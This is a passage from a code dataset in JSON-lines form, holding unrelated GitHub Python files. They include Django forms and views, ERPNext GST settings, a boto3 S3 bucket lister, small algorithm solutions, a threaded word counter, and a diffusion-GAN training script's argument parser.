Loss\"])\nplt.show()\n\n\n","repo_name":"BK-Modding/dogs-vs-cats-image-classifier","sub_path":"pretrained_vgg16_train.py","file_name":"pretrained_vgg16_train.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19158789934","text":"import time\nimport pyautogui\nimport Test_Script.common_function as co\n\n\nlog = co.logger()\n\n\ndef check_window(runflag, picture):\n count = 0\n time.sleep(3)\n if runflag == \"F\":\n system_window = pyautogui.locateOnScreen(picture)\n if system_window is not None:\n log.info(\"window opens successfully\")\n return True\n else:\n while count <= 5:\n log.info(\"window opens failed!\")\n count += 1\n if count == 6:\n return False\n else:\n system_window = pyautogui.locateOnScreen(picture)\n if system_window is None:\n log.info(\"window closes successfully\")\n return True\n else:\n while count <= 5:\n log.info(\"window closes failed!\")\n count += 1\n if count == 6:\n return False\n\n\n","repo_name":"nettlay/linuxTP7","sub_path":"Test_Script/Check_window.py","file_name":"Check_window.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40794976235","text":"from django import forms\nfrom django.conf import settings\nfrom django.core.validators import RegexValidator\nfrom django.http import HttpResponse\nfrom jsonschema.exceptions import ValidationError\n\nfrom user import models\nfrom utils.tencent.sms import send_sms_single\nimport random\nfrom user.forms.bootstrap import BootStrap\n\n\nclass LoginSmsForm(BootStrap, forms.Form):\n mobile_phone = forms.CharField(\n label='手机号',\n validators=[RegexValidator(r'^(1[3|4|5|6|7|8|9])\\d{9}$', '手机号格式不正确'), ]\n )\n code = forms.CharField(\n label='验证码',\n widget=forms.TextInput())\n\n def __init__(self, request, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.request = request\n\n # 未进行检验\n # def clean_mobile_phone(self):\n # mobile_phone = self.cleaned_data['mobile_phone']\n # exists = models.UserInfo.objects.filter(mobile_phone=mobile_phone).exists()\n #\n # if not exists:\n # raise ValidationError('⼿机号不存在')\n # return mobile_phone\n # #\n def clean_code(self):\n code = self.cleaned_data['code']\n print(code)\n mobile_phone = self.cleaned_data.get('mobile_phone')\n # ⼿机号不存在,则验证码⽆需再校验\n if not mobile_phone:\n return code\n session_code = self.request.session.get('code') # 从session中获取验证码\n if not session_code:\n raise ValidationError('验证码失效或未发送,请重新发送')\n # redis_str_code = redis_code.decode('utf-8')\n if code.strip().upper() != session_code.strip().upper():\n raise ValidationError('验证码错误,请重新输⼊')\n return code\n","repo_name":"fukioston/FleaMarket","sub_path":"user/forms/login_sms_form.py","file_name":"login_sms_form.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12577616164","text":"\n# 육각형이니까\n# 2~7 : 2개 (6개까지)\n# 8~19: 3개 (12개까지)\n# 20~37 : 4개 (18개까지)\n\nn = int(input())\nresult = 1\ncnt = 1\n\nwhile n > result:\n result += 6 * cnt\n cnt += 1\n\nprint(cnt)\n\n\n","repo_name":"haremeat/Algorithm","sub_path":"boj/2292.py","file_name":"2292.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42667797272","text":"#이것이 코딩 테스트다\n#정렬 : 데이터를 특정 기준에 따라 순서대로 나열하는 것\n#성적이 낮은 순서로 학생 출력하기 (오름차순) \n\nn = int(input())\narray = []\nfor i in range(n) :\n input_data = input().split()\n array.append((input_data[0], input_data[1]))\n\narray = sorted(array, key=lambda student: student[1])\n\nfor student in array :\n print(student[0], end = ' ')","repo_name":"parkjeongmi/jamie_study","sub_path":"sort/sort12_2.py","file_name":"sort12_2.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13300467496","text":"def DetectCurrentFace( hebi, Group ):\n\n import scipy.io as scio\n import sys\n import numpy as np\n\n### This was used for testing purposes only\n\n # import hebi # for the Hebi motors\n # from time import sleep\n #\n # # Need to look into XML formatting for Hebi Gains\n # # sio.loadmat('defaultGains.mat')\n #\n # lookup = hebi.Lookup() # Get table of all Hebi motors\n # sleep(2) # gives the Lookup process time to discover modules\n #\n # # Displays the Hebi modules found on the network\n # print('Modules found on the network:')\n #\n # for entry in lookup.entrylist:\n # print('{0} | {1}'.format(entry.family, entry.name))\n #\n # # print('\\n')\n #\n # var = raw_input('Were any modules found? [y/N]: \\n')\n # if var == 'y':\n # print('\\nYay!\\n')\n # elif var == 'Y':\n # print('\\nYay!\\n')\n # else:\n # print('\\nNONE FOUND!\\n')\n # sys.exit()\n #\n # Group = lookup.get_group_from_family('*')\n # infoTable = Group.request_info()\n\n### This was used for testing purposes only\n\n trainingData = scio.loadmat('IMUTrainingRutgers.mat') # training data gathered from MATLAB\n\n labels = np.float(trainingData['labs'][0][0][0])\n\n for i in range(1,len(trainingData['labs'])):\n labels = np.append(labels,np.float(trainingData['labs'][i][0][0]))\n\n # Create KNN model\n from sklearn.neighbors import KNeighborsRegressor\n knn = KNeighborsRegressor(n_neighbors=10)\n # Fit the model\n knn.fit(trainingData['trainingData'], labels)\n\n fbk = hebi.GroupFeedback(Group.size)\n Group.feedback_frequency = 200.0\n fbk = Group.get_next_feedback(reuse_fbk=fbk)\n\n # if(fbk.size != trainingData['nbMotors'][0][0]):\n # print('Something is wrong with the number of connected motors!')\n # return 0\n\n accel = fbk.accelerometer.reshape(1,-1)\n [d, n] = knn.kneighbors(accel, 10) # give the lines which most closely match in variable \"n\"\n predicted_lines = np.asanyarray(labels[n[0]], dtype=int) # obtains the label values which were predicted in \"n\"\n counts = np.bincount(predicted_lines) # counts each instance of face numbers\n face = np.argmax(counts) # finds the face with the highest number of instances [THIS IS OUR PREDICTION]\n\n return face\n","repo_name":"JEB12345/SB2_python_scripts","sub_path":"DetectCurrentFace.py","file_name":"DetectCurrentFace.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18664383989","text":"import re, sys, collections\nimport os\nfrom concurrent.futures import ThreadPoolExecutor\nimport threading\n\n# stopwords = set(open('stop_words').read().split(','))\n# words = re.findall('\\w{3,}', open(sys.argv[1]).read().lower())\n# counts = collections.Counter(w for w in words if w not in stopwords)\n# for (w, c) in counts.most_common(25):\n# print(w, '-', c)\n\ntotalCount = collections.Counter()\nlock = threading.Lock() \n\ndef calcWords(file):\n stopwords = set(open('stop_words').read().split(','))\n words = re.findall('\\w{3,}', open(file).read().lower())\n counts = collections.Counter(w for w in words if w not in stopwords)\n \n # guard shared mutable state totalCount with a lock\n lock.acquire()\n totalCount.update(counts)\n lock.release()\n\n\nfileList = []\n\n# create a list of all the txt files to be read\nfor files in os.listdir(\"./\"):\n if files.endswith(\".txt\"):\n fileList.append(files)\n\n# start a thread for each txt file\nwith ThreadPoolExecutor() as exec:\n for file in fileList:\n exec.submit(calcWords, file)\n\nfor(w, c) in totalCount.most_common(25):\n print(w, '-', c)","repo_name":"justincavalli/ConcurrentPrograms","sub_path":"PythonWordCounter/tf.py","file_name":"tf.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44119915765","text":"import numpy as np\nfrom matplotlib.colors import ListedColormap\n\ndef plot_classf_model(X, y, model, ax, title=None, step=0.01, epsilon=0.1, contour=False):\n \"\"\"\n Contourplot a two-class underlying model, and test datapoints.\n \n Paramters\n ---------\n X: Matrix(mxn, R)\n Matrix of feature vectors with examples\n y: n-dimensional vector \n Actual classes for each of the 'm' provided examples.\n \"\"\"\n custom_cmap = ListedColormap(['#fafab0','#9898ff','#a0faa0'])\n points_cmap = ListedColormap([\"Yellow\", \"Blue\"])\n x0, x1 = X[:,0].min() - epsilon, X[:,0].max() + epsilon\n y0, y1 = X[:,1].min() - epsilon, X[:,1].max() + epsilon\n \n xx, yy = np.mgrid[x0:x1:step, y0:y1:step]\n \n preds = model.predict(np.c_[xx.ravel(), yy.ravel()])\n preds = preds.reshape(xx.shape)\n \n if contour:\n ax.contour(xx, yy, preds)\n ax.pcolormesh(xx, yy, preds, cmap=custom_cmap)\n ax.scatter(*X.T, c=y, s=50, edgecolor=\"k\", cmap=points_cmap)\n if title is not None:\n ax.set_title(title)","repo_name":"Fegrodz/Machine-Learning-Proyects","sub_path":"files/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38144726459","text":"import json\nimport os\n\nimport frappe\nfrom frappe import _\nfrom frappe.contacts.doctype.contact.contact import get_default_contact\nfrom frappe.model.document import Document\nfrom frappe.utils import date_diff, flt, get_url, nowdate\n\n\nclass EmailMissing(frappe.ValidationError):\n\tpass\n\n\nclass GSTSettings(Document):\n\tdef onload(self):\n\t\tdata = frappe._dict()\n\t\tdata.total_addresses = frappe.db.sql(\n\t\t\t'''select count(*) from tabAddress where country = \"India\"'''\n\t\t)\n\t\tdata.total_addresses_with_gstin = frappe.db.sql(\n\t\t\t\"\"\"select distinct count(*)\n\t\t\tfrom tabAddress where country = \"India\" and ifnull(gstin, '')!='' \"\"\"\n\t\t)\n\t\tself.set_onload(\"data\", data)\n\n\tdef validate(self):\n\t\t# Validate duplicate accounts\n\t\tself.validate_duplicate_accounts()\n\n\tdef validate_duplicate_accounts(self):\n\t\taccount_list = []\n\t\tfor account in self.get(\"gst_accounts\"):\n\t\t\tfor fieldname in [\"cgst_account\", \"sgst_account\", \"igst_account\", \"cess_account\"]:\n\t\t\t\tif account.get(fieldname) in account_list:\n\t\t\t\t\tfrappe.throw(\n\t\t\t\t\t\t_(\"Account {0} appears multiple times\").format(frappe.bold(account.get(fieldname)))\n\t\t\t\t\t)\n\n\t\t\t\tif account.get(fieldname):\n\t\t\t\t\taccount_list.append(account.get(fieldname))\n\n\n@frappe.whitelist()\ndef send_reminder():\n\tfrappe.has_permission(\"GST Settings\", throw=True)\n\n\tlast_sent = frappe.db.get_single_value(\"GST Settings\", \"gstin_email_sent_on\")\n\tif last_sent and date_diff(nowdate(), last_sent) < 3:\n\t\tfrappe.throw(_(\"Please wait 3 days before resending the reminder.\"))\n\n\tfrappe.db.set_value(\"GST Settings\", \"GST Settings\", \"gstin_email_sent_on\", nowdate())\n\n\t# enqueue if large number of customers, suppliser\n\tfrappe.enqueue(\n\t\t\"erpnext.regional.doctype.gst_settings.gst_settings.send_gstin_reminder_to_all_parties\"\n\t)\n\tfrappe.msgprint(_(\"Email Reminders will be sent to all parties with email contacts\"))\n\n\ndef send_gstin_reminder_to_all_parties():\n\tparties = []\n\tfor address_name in frappe.db.sql(\n\t\t\"\"\"select name\n\t\tfrom tabAddress where country = \"India\" and ifnull(gstin, '')='' \"\"\"\n\t):\n\t\taddress = frappe.get_doc(\"Address\", address_name[0])\n\t\tfor link in address.links:\n\t\t\tparty = frappe.get_doc(link.link_doctype, link.link_name)\n\t\t\tif link.link_doctype in (\"Customer\", \"Supplier\"):\n\t\t\t\tt = (link.link_doctype, link.link_name, address.email_id)\n\t\t\t\tif not t in parties:\n\t\t\t\t\tparties.append(t)\n\n\tsent_to = []\n\tfor party in parties:\n\t\t# get email from default contact\n\t\ttry:\n\t\t\temail_id = _send_gstin_reminder(party[0], party[1], party[2], sent_to)\n\t\t\tsent_to.append(email_id)\n\t\texcept EmailMissing:\n\t\t\tpass\n\n\n@frappe.whitelist()\ndef send_gstin_reminder(party_type, party):\n\t\"\"\"Send GSTIN reminder to one party (called from Customer, Supplier form)\"\"\"\n\tfrappe.has_permission(party_type, throw=True)\n\temail = _send_gstin_reminder(party_type, party)\n\tif email:\n\t\tfrappe.msgprint(_(\"Reminder to update GSTIN Sent\"), title=\"Reminder sent\", indicator=\"green\")\n\n\ndef _send_gstin_reminder(party_type, party, default_email_id=None, sent_to=None):\n\t\"\"\"Send GST Reminder email\"\"\"\n\temail_id = frappe.db.get_value(\"Contact\", get_default_contact(party_type, party), \"email_id\")\n\tif not email_id:\n\t\t# get email from address\n\t\temail_id = default_email_id\n\n\tif not email_id:\n\t\tfrappe.throw(_(\"Email not found in default contact\"), exc=EmailMissing)\n\n\tif sent_to and email_id in sent_to:\n\t\treturn\n\n\tfrappe.sendmail(\n\t\tsubject=\"Please update your GSTIN\",\n\t\trecipients=email_id,\n\t\tmessage=\"\"\"\n\t\t

    Hello,

    \n\t\t

    Please help us send you GST Ready Invoices.

    \n\t\t

    \n\t\t\t\n\t\t\tClick here to update your GSTIN Number in our system\n\t\t\t\n\t\t

    \n\t\t

    \n\t\t\tGet your GST Ready ERP system at https://erpnext.com\n\t\t\t
    \n\t\t\tERPNext is a free and open source ERP system.\n\t\t

    \n\t\t\"\"\".format(\n\t\t\tos.path.join(get_url(), \"/regional/india/update-gstin\"), party\n\t\t),\n\t)\n\n\treturn email_id\n\n\n@frappe.whitelist()\ndef update_hsn_codes():\n\tfrappe.enqueue(enqueue_update)\n\tfrappe.msgprint(_(\"HSN/SAC Code sync started, this may take a few minutes...\"))\n\n\ndef enqueue_update():\n\twith open(os.path.join(os.path.dirname(__file__), \"hsn_code_data.json\"), \"r\") as f:\n\t\thsn_codes = json.loads(f.read())\n\n\tfor hsn_code in hsn_codes:\n\t\ttry:\n\t\t\thsn_code_doc = frappe.get_doc(\"GST HSN Code\", hsn_code.get(\"hsn_code\"))\n\t\t\thsn_code_doc.set(\"gst_rates\", [])\n\t\t\tfor rate in hsn_code.get(\"gst_rates\"):\n\t\t\t\thsn_code_doc.append(\n\t\t\t\t\t\"gst_rates\",\n\t\t\t\t\t{\n\t\t\t\t\t\t\"minimum_taxable_value\": flt(hsn_code.get(\"minimum_taxable_value\")),\n\t\t\t\t\t\t\"tax_rate\": flt(rate.get(\"tax_rate\")),\n\t\t\t\t\t},\n\t\t\t\t)\n\n\t\t\thsn_code_doc.save()\n\t\texcept Exception as e:\n\t\t\tpass\n","repo_name":"RafMo20D/erpnext-ksa-op","sub_path":"erpnext/regional/doctype/gst_settings/gst_settings.py","file_name":"gst_settings.py","file_ext":"py","file_size_in_byte":4622,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"41417420810","text":"import os\nimport sys\nfrom .base import *\n\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '+=%r&tifrvtste5)88zzq#4#qsq5u$xu=ptuu)1xh)huy$$d&#'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\n# wq: Determine if we are running off django's testing server\nDEBUG_WITH_RUNSERVER = 'manage.py' in sys.argv[0]\n\n\nif DEBUG_WITH_RUNSERVER:\n STATICFILES_DIRS = [\n os.path.join(BASE_DIR, 'app', 'build', 'static')\n ]\n\n\nALLOWED_HOSTS = []\n\n# Database\n# https://docs.djangoproject.com/en/2.0/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n # To enable GeoDjango:\n # 'ENGINE': 'django.contrib.gis.db.backends.spatialite',\n 'NAME': os.path.join(BASE_DIR, 'conf', 'testproject.sqlite3'),\n }\n}\n\n# SPATIALITE_LIBRARY_PATH = 'mod_spatialite.so'\n","repo_name":"fccoelho/optrix","sub_path":"db/optrix/settings/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"25332251166","text":"\"\"\"\nTests on the repository activation/deactivation functions\n\"\"\"\n\nfrom octopus.modules.es.testindex import ESTestCase\nfrom service import control, models\nimport time\n\nclass TestModels(ESTestCase):\n def setUp(self):\n super(TestModels, self).setUp()\n\n def tearDown(self):\n super(TestModels, self).tearDown()\n\n def test_01_activate_deactivate(self):\n # first, activation should create a status if none exists\n control.activate_deposit(\"123456789\")\n\n time.sleep(2)\n\n rs = models.RepositoryStatus.pull(\"123456789\")\n assert rs is not None\n assert rs.status == \"succeeding\"\n\n # now deactivate that account\n control.deactivate_deposit(\"123456789\")\n\n time.sleep(2)\n\n rs = models.RepositoryStatus.pull(\"123456789\")\n assert rs is not None\n assert rs.status == \"failing\"\n\n # now re-activate that account\n control.activate_deposit(\"123456789\")\n\n time.sleep(2)\n\n rs = models.RepositoryStatus.pull(\"123456789\")\n assert rs is not None\n assert rs.status == \"succeeding\"\n\n\n","repo_name":"JiscPER/jper-sword-out","sub_path":"service/tests/unit/test_control.py","file_name":"test_control.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70140123434","text":"from django.shortcuts import render,redirect\nfrom django.shortcuts import get_object_or_404\nfrom django.http import HttpResponse\nfrom lessonsApp.models import Lessons\nfrom coursesApp.models import Courses\nfrom django.contrib.auth.models import User\nfrom .forms import LessonsForm\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\n\nfrom django.views.generic.edit import UpdateView\nfrom django.views.generic.edit import DeleteView\n\n\n@login_required(login_url='login')\ndef lessons(request):\n cid=request.GET['cid']\n course=Courses.objects.get(pk=cid)\n lessons=Lessons.objects.filter(course=course)\n context={'course':course,'lessons':lessons}\t\t\n return render(request,'lessonsApp/lessons_list.html',context)\n\n\n@login_required(login_url='login')\n\ndef createLesson(request):\n\tif request.method=='GET':\n\t\tif 'cid' in request.GET:\n\t\t\tcid=request.GET['cid']\n\t\t\tcourse=Courses.objects.get(pk=cid)\n\t\t\tform=LessonsForm()\n\t\t\tcontext={'course':course,'form':form}\t\n\t\t\treturn render(request,'lessonsApp/lessons_create.html',context)\n\t\treturn HttpResponse(status=404)\n\t\t\t\n\tif request.method=='POST':\n\t\tif 'cid' in request.POST:\n\t\t\tcid=request.POST.get('cid')\n\t\t\tcourse=Courses.objects.get(pk=cid)\n\t\t\tform=LessonsForm(request.POST,request.FILES)\n\t\t\tif form.is_valid():\n\t\t\t\tlesson=form.save(commit=False)\n\t\t\t\tlesson.course=course\n\t\t\t\tlesson.save()\n\t\t\t\treturn redirect('/lessons/?cid='+cid)\t\t\t\t\n\t\treturn HttpResponse(status=400)\t\n\n@method_decorator(login_required(login_url='/users/'), name='dispatch')\t\nclass LessonsUpdateView(UpdateView):\n\n\tmodel=Lessons\n\tform_class=LessonsForm\n\ttemplate_name_suffix = '_update_form'\n\tsuccess_url='/'\n\n\tdef get_object(self):\n\t\tid=self.kwargs.get(\"id\")\n\t\tcid=self.kwargs.get(\"cid\")\n\t\tself.success_url='/lessons/?cid='+str(cid)\n\t\treturn get_object_or_404(Lessons,id=id)\t\t\n\n@method_decorator(login_required(login_url='/users/'), name='dispatch')\nclass LessonsDeleteView(DeleteView):\n\tmodel=Lessons\n\ttemplate_name_suffix = '_delete'\n\tsuccess_url='/'\n\n\tdef get_object(self):\n\t\tid=self.kwargs.get(\"id\")\n\t\tcid=self.kwargs.get(\"cid\")\n\t\tself.success_url='/lessons/?cid='+str(cid)\n\t\treturn get_object_or_404(Lessons,id=id)\n","repo_name":"glen-s-abraham/Elearning-platform","sub_path":"lessonsApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33340814261","text":"class Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n hayLen = len(haystack)\n needleLen = len(needle)\n if needleLen == 0:\n return 0\n elif needleLen > hayLen:\n return -1\n left = 0\n right = needleLen\n while right <= hayLen:\n if haystack[left:right] == needle:\n return left\n else:\n left += 1\n right += 1\n return -1","repo_name":"natitedros/Competitive-Programming","sub_path":"String/ImplementStrStr.py","file_name":"ImplementStrStr.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"13211877638","text":"#!/usr/bin/env python3\n\nimport boto3\nimport json\n\ndef main():\n print(\"<---START--->\")\n\n s3Client = boto3.client(\"s3\")\n\n # bucketsFile = open(\"./files/open_buckets_dev.txt\", \"r\")\n # bucketsNames = bucketsFile.readlines()\n\n response = s3Client.list_buckets()\n\n for bucket in response['Buckets']:\n bucketName = bucket[\"Name\"]\n\n print(f\"==> Evaluating Bucket: {bucketName}\")\n\n if bucketName.find(\"-artifacts\") != -1:\n #example bucketName = 064530618445-hayday-update-to-base-artifacts\n\n tokens = bucketName.split(\"-\")\n accNo = tokens[0]\n gameName = tokens[1]\n\n tokens = bucketName.split(\"-artifacts\")\n tmpString = tokens[0]\n\n tokens = tmpString.split(f\"{accNo}-{gameName}-\")\n\n branchName = tokens[1]\n\n print(f\"GameName={gameName}, BranchName={branchName}\")\n\n print(\"\")\n\n print(\"<--FINISH-->\")\n\nmain()\n","repo_name":"vjkancherla/Python-Examples","sub_path":"py3_boto3/08-S3ListAndSplitName.py","file_name":"08-S3ListAndSplitName.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71520918314","text":"from __future__ import annotations\n\nimport uuid\nfrom datetime import datetime, timedelta\nfrom traceback import format_exc\nfrom typing import List, Optional\n\nfrom django.db import models\n\n\nclass Lexer(models.Model):\n name = models.CharField(max_length=225)\n\n @classmethod\n def get_object_by_id(cls, pk: int) -> Optional[Lexer]:\n result = cls.objects.all().filter(pk=pk) # noqa\n return result[0] if len(result) > 0 else None\n\n @classmethod\n def get_object_by_name(cls, name: str) -> Optional[Lexer]:\n result = cls.objects.all().filter(name=name) # noqa\n return result[0] if len(result) > 0 else None\n\n @classmethod\n def get_lexers_as_list(cls) -> List[Lexer]:\n return list(cls.objects.all()) # noqa\n\n @classmethod\n def create_lexer(cls, name: str) -> Optional[Paste]:\n try:\n lexer = cls.objects.create(name=name) # noqa\n return lexer\n\n except Exception as e_info:\n print(e_info)\n return None\n\n\nclass Paste(models.Model):\n lex = models.ForeignKey(Lexer, on_delete=models.CASCADE, null=False)\n name = models.CharField(max_length=255, default=\"Text snippet\")\n uuid = models.CharField(max_length=255)\n content = models.TextField(default=\"\")\n inspiration_date = models.DateField()\n\n @classmethod\n def get_object(cls, unique_id: int) -> Optional[Paste]:\n result = cls.objects.all().filter(uuid=unique_id) # noqa\n return result[0] if len(result) > 0 else None\n\n @classmethod\n def get_paste_by_uuid_as_list(cls, unique_id: int) -> List[Paste]:\n return cls.objects.all().filter(uuid=unique_id) # noqa\n\n @classmethod\n def create_paste(\n cls,\n lex_id: int,\n content: str,\n inspiration_date: datetime,\n name: str = \"Text snippet\",\n ) -> Optional[Paste]:\n try:\n if inspiration_date == 0:\n paste = cls.objects.create( # noqa\n lex_id=lex_id,\n name=name,\n content=content,\n inspiration_date=datetime.now() + timedelta(days=7),\n uuid=str(uuid.uuid1()),\n )\n return paste\n\n paste = cls.objects.create( # noqa\n lex_id=lex_id,\n name=name,\n content=content,\n uuid=str(uuid.uuid1()),\n inspiration_date=inspiration_date,\n )\n return paste\n\n except Exception:\n print(format_exc())\n return None\n","repo_name":"Kel0/share_gist","sub_path":"backend/share/paste/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34823550330","text":"import cv2\nimport time\nprint(cv2.__version__)\nwidth=640\nheight=360\nmyRadius = 25\ncircleThickness = 2 \nblackColor = (0,0,0)\ngreenColor = (0,255,0)\nblueColor = (255,0,0)\nfps = 30\nmyText = 'Viktor is Boss'\nnumFrames = 0\ncam=cv2.VideoCapture(0,cv2.CAP_DSHOW)\ncam.set(cv2.CAP_PROP_FRAME_WIDTH, width)\ncam.set(cv2.CAP_PROP_FRAME_HEIGHT,height)\ncam.set(cv2.CAP_PROP_FPS, fps)\ncam.set(cv2.CAP_PROP_FOURCC,cv2.VideoWriter_fourcc(*'MJPG'))\nwhile True:\n ignore, frame = cam.read()\n frame[140:220,250:390] = blueColor\n cv2.rectangle(frame,(250,140),(390,220),color = greenColor, thickness = 4)\n cv2.circle(frame,(width//2,height//2),radius = myRadius,color = blackColor, thickness= circleThickness)\n #cv2.putText(frame,myText,org = (120,60),fontFace= cv2.FONT_HERSHEY_COMPLEX,fontScale = 2.5,color =blueColor,thickness = 2)\n numFrames = numFrames + 1\n cv2.putText(frame,str(numFrames),org = (0,60),fontFace= cv2.FONT_HERSHEY_COMPLEX,fontScale = 2.5,color =blackColor,thickness = 2)\n cv2.imshow('my WEBcam', frame)\n cv2.moveWindow('my WEBcam',0,0)\n if cv2.waitKey(1) & 0xff ==ord('q'):\n break\ncam.release()","repo_name":"VikThor997/Hobby","sub_path":"OpenCVPython/openCV-7.py","file_name":"openCV-7.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70539116393","text":"# 문제 : https://www.acmicpc.net/problem/2110\n\nimport sys\ninput = sys.stdin.readline\n\nn, c = map(int, input().split())\nhome = [int(input()) for _ in range(n)]\nhome.sort()\n\nstart = home[0]\nend = home[-1] - home[0]\n\nwhile start < end:\n mid = start + end // 2\n tmp = home[0]\n count = 1\n\n for i in range(1, len(home)):\n if home[i] >= mid + tmp:\n count += 1\n tmp = home[i]\n\n if count >= c:\n start = mid + 1\n else:\n end = mid - 1\nprint(mid)","repo_name":"fbghgus123/algorithm","sub_path":"python/백준/이분탐색/2110_공유기설치.py","file_name":"2110_공유기설치.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34294158238","text":"def factorial(n):\n if n < 1:\n return None\n \n factorial = 1\n for value in range(1,n+1): \n factorial*=value \n return factorial\n \n\ndef smart_factorial(n):\n if n == 1: # The base case (termination condition.)\n return 1\n else:\n return n * factorial(n - 1) #n-- until 1 \n\n\n\nfor n in range(1, 10):\n print(n, \"->\", factorial(n))\n","repo_name":"sostenuto95/codepractice","sub_path":"Python/my_factorial.py","file_name":"my_factorial.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3795992623","text":"# ---------------------------------------------------------------\r\n# Copyright (c) 2022, NVIDIA CORPORATION. All rights reserved.\r\n#\r\n# This work is licensed under the NVIDIA Source Code License\r\n# for Denoising Diffusion GAN. To view a copy of this license, see the LICENSE file.\r\n# ---------------------------------------------------------------\r\n\r\n\r\nimport argparse\r\nimport torch\r\nimport numpy as np\r\nimport rawpy\r\nimport os\r\n\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nimport torchvision\r\n\r\nimport torchvision.transforms as transforms\r\nfrom torchvision.datasets import CIFAR10\r\nfrom datasets_prep.lsun import LSUN\r\nfrom datasets_prep.stackmnist_data import StackedMNIST, _data_transforms_stacked_mnist\r\nfrom datasets_prep.lmdb_datasets import LMDBDataset\r\n\r\nfrom network import Network\r\n\r\nfrom torch.multiprocessing import Process\r\nimport torch.distributed as dist\r\nimport shutil\r\n\r\ndef init_processes(rank, size, fn, args):\r\n \"\"\" Initialize the distributed environment. \"\"\"\r\n os.environ['MASTER_ADDR'] = args.master_address\r\n os.environ['MASTER_PORT'] = '6020'\r\n torch.cuda.set_device(args.local_rank)\r\n gpu = args.local_rank\r\n dist.init_process_group(backend='nccl', init_method='env://', rank=rank, world_size=size)\r\n fn(rank, gpu, args)\r\n dist.barrier()\r\n cleanup() \r\n\r\ndef cleanup():\r\n dist.destroy_process_group() \r\n#%%\r\nif __name__ == '__main__':\r\n opt = argparse.ArgumentParser('ddgan parameters')\r\n opt.add_argument('--seed', type=int, default=1024,\r\n help='seed used for initialization')\r\n \r\n opt.add_argument('--resume', action='store_true',default=False)\r\n \r\n opt.add_argument('--image_size', type=int, default=32,\r\n help='size of image')\r\n opt.add_argument('--num_channels', type=int, default=4,\r\n help='channel of image')\r\n opt.add_argument('--centered', action='store_false', default=True,\r\n help='-1,1 scale')\r\n opt.add_argument('--use_geometric', action='store_true',default=False)\r\n opt.add_argument('--beta_min', type=float, default= 0.1,\r\n help='beta_min for diffusion')\r\n opt.add_argument('--beta_max', type=float, default=20.,\r\n help='beta_max for diffusion')\r\n \r\n \r\n opt.add_argument('--num_channels_dae', type=int, default=128,\r\n help='number of initial channels in denosing model')\r\n opt.add_argument('--n_mlp', type=int, default=3,\r\n help='number of mlp layers for z')\r\n opt.add_argument('--ch_mult', nargs='+', type=int,\r\n help='channel multiplier')\r\n opt.add_argument('--num_res_blocks', type=int, default=2,\r\n help='number of resnet blocks per scale')\r\n opt.add_argument('--attn_resolutions', default=(16,),\r\n help='resolution of applying attention')\r\n opt.add_argument('--dropout', type=float, default=0.,\r\n help='drop-out rate')\r\n opt.add_argument('--resamp_with_conv', action='store_false', default=True,\r\n help='always up/down sampling with conv')\r\n opt.add_argument('--conditional', action='store_false', default=True,\r\n help='noise conditional')\r\n opt.add_argument('--fir', action='store_false', default=True,\r\n help='FIR')\r\n opt.add_argument('--fir_kernel', default=[1, 3, 3, 1],\r\n help='FIR kernel')\r\n opt.add_argument('--skip_rescale', action='store_false', default=True,\r\n help='skip rescale')\r\n opt.add_argument('--resblock_type', default='biggan',\r\n help='tyle of resnet block, choice in biggan and ddpm')\r\n opt.add_argument('--progressive', type=str, default='none', choices=['none', 'output_skip', 'residual'],\r\n help='progressive type for output')\r\n opt.add_argument('--progressive_input', type=str, 